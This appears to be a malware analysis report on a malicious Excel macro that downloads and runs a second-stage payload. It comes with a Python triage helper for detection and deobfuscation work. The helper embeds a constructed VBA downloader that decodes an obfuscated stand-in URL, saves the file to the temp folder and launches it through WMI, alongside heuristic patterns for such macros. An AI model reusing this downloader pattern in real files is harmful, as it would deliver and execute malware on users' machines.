Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 a6fdd0629ed927d7…

MALICIOUS

Office (OLE) / .XLS

Size: 67.0 KB
Created: 2022-06-29 08:40:51
First seen: 2022-06-29
MD5: 18625572bfa5c43e880823c53bed502c
SHA-1: 42ee8411f3cf94942818be6a54ec5ebc03d08979
SHA-256: a6fdd0629ed927d7b38a7309bcfcadd08e6a7368b3f18ca49a7d40c755193312
Risk score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The VBA macro declares and calls the URLDownloadToFile API (urlmon) to fetch a file from a URL that is assembled at runtime from an obfuscated string. The download is written to the user's temporary directory under a randomly generated name, which is consistent with the Environ() call flagged below, and the macro then attempts to execute that file, so the download is most likely a second-stage payload. The analyzer reports the recovered URL as "http://137.123.128.127.134.133.76.76.76.123.128.136.119.133.134.130.132.123.118.119.133.64.117.129.127". Note that this value is not a usable hostname or IPv4 address: a dot-separated run of decimal values is an intermediate encoding (character codes that still await the macro's own Chr()-style transform) which the automated string recovery did not finish decoding. Treat it as evidence of string obfuscation rather than as a network indicator, and recover the real URL by replaying the decoding routine in the extracted macros.bas.

Heuristics (5)

  • SC_STR_URLDOWNLOAD (critical): Reference to URLDownloadToFile API
  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile in VBA
  • OLE_VBA_GETOBJ (high): GetObject call
  • OLE_VBA_MACROS (medium): Document contains VBA macro code
  • OLE_VBA_ENVIRON (low): Environ() call (env variable access)
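The following triage helper is an added example, not code from the report or from the sample itself. It shows the two things a practitioner would want to do with the findings above: run the same kind of pattern heuristics (URLDownloadToFile, GetObject, Environ) over extracted VBA source, and try to finish decoding a numeric string of the kind the analyzer left half-recovered. The VBA in SAMPLE_VBA is constructed for the demonstration (an urlmon download into %TEMP% followed by WMI process creation, with the URL built from an offset Chr() array); it is not the decoded source of the analysed file. The regexes are this example's own approximations of the report's rule IDs, and constant-offset Chr() decoding is one common obfuscation style, not a claim about how this particular macro encodes its string. The report's dotted-decimal value is included only to show that a constant-offset decode does not recover it, which is why the macro's own routine has to be replayed.

```python
"""Triage helper for a Chr()-encoded VBA downloader (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed stand-in for the macro: urlmon download into %TEMP%, then WMI
# process creation, with the URL built from an offset Chr() array. This is an
# illustration, not the decoded source of the sample analysed in the report.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Auto_Open()
    Dim k As Variant, u As String, dest As String, i As Integer
    k = Array(117, 129, 129, 125, 71, 60, 60, 114, 133, 110, 122, 125, 121, 114, 59, 129, 114, 128, 129, 60, 125, 110, 134, 121, 124, 110, 113, 59, 114, 133, 114)
    For i = 0 To UBound(k)
        u = u & Chr(k(i) - 13)
    Next i
    dest = Environ("TEMP") & "\" & CStr(Int(Rnd() * 100000)) & ".exe"
    URLDownloadToFileA 0, u, dest, 0, 0
    GetObject("winmgmts:").Get("Win32_Process").Create dest, Null, Null, 0
End Sub
'''

# The analyzer's "deobfuscated" value from the report, minus the http:// it prepended.
REPORT_STRING = ("137.123.128.127.134.133.76.76.76.123.128.136.119.133.134.130."
                 "132.123.118.119.133.64.117.129.127")

# Rule IDs taken from the report; the regexes are this example's own approximations.
HEURISTICS: Dict[str, Tuple[str, str]] = {
    "OLE_VBA_DOWNLOAD": (r"\bURLDownloadToFile[AW]?\b", "critical"),
    "OLE_VBA_GETOBJ": (r"\bGetObject\s*\(", "high"),
    "OLE_VBA_ENVIRON": (r"\bEnviron\s*\(", "low"),
}

# Accept only something that fully parses as an http(s) URL with an ASCII path.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[\x21-\x7e]*)?")


def scan_vba(src: str) -> List[Tuple[str, str, int]]:
    """Return (rule_id, severity, 1-based line) for the first hit of each rule."""
    hits = []
    for rule, (pattern, severity) in HEURISTICS.items():
        m = re.search(pattern, src, re.IGNORECASE)
        if m:
            hits.append((rule, severity, src.count("\n", 0, m.start()) + 1))
    return hits


def extract_numeric_arrays(src: str) -> List[List[int]]:
    """Pull the integer literals out of every Array(...) in the source."""
    arrays = []
    for m in re.finditer(r"Array\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", src, re.IGNORECASE):
        arrays.append([int(v) for v in re.findall(r"\d+", m.group(1))])
    return arrays


def parse_dotted_decimal(s: str) -> List[int]:
    """Turn a dot-separated run of decimal values into a list of ints."""
    return [int(v) for v in s.strip().split(".") if v]


def decode_candidates(values: List[int], max_offset: int = 64) -> List[Tuple[int, str]]:
    """Try Chr(v - k) for every constant k; keep results that are printable URLs."""
    found = []
    for k in range(-max_offset, max_offset + 1):
        codes = [v - k for v in values]
        if all(32 <= c <= 126 for c in codes):
            text = "".join(chr(c) for c in codes)
            if URL_RE.fullmatch(text):
                found.append((k, text))
    return found


def triage(src: str) -> Dict[str, object]:
    """One-shot view: heuristic hits plus any URL recovered from Chr() arrays."""
    urls = [u for arr in extract_numeric_arrays(src) for _, u in decode_candidates(arr)]
    return {"hits": scan_vba(src), "urls": urls}


if __name__ == "__main__":
    print(triage(SAMPLE_VBA))
    # The report's string yields no candidate under a constant offset.
    print(decode_candidates(parse_dotted_decimal(REPORT_STRING)))
```

To use it on the real artifact, feed the decoded VBA that olevba extracts (macros.bas in the listing below) to triage(); if decode_candidates() returns nothing for the strings it finds, the encoding is not a constant offset and the decoding loop in the macro itself has to be stepped through or re-implemented.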

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 8012cacf36a788912ce9a7cb8034561aba0a18cc8d734dd5088e8c199b7c48ff
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2200 bytes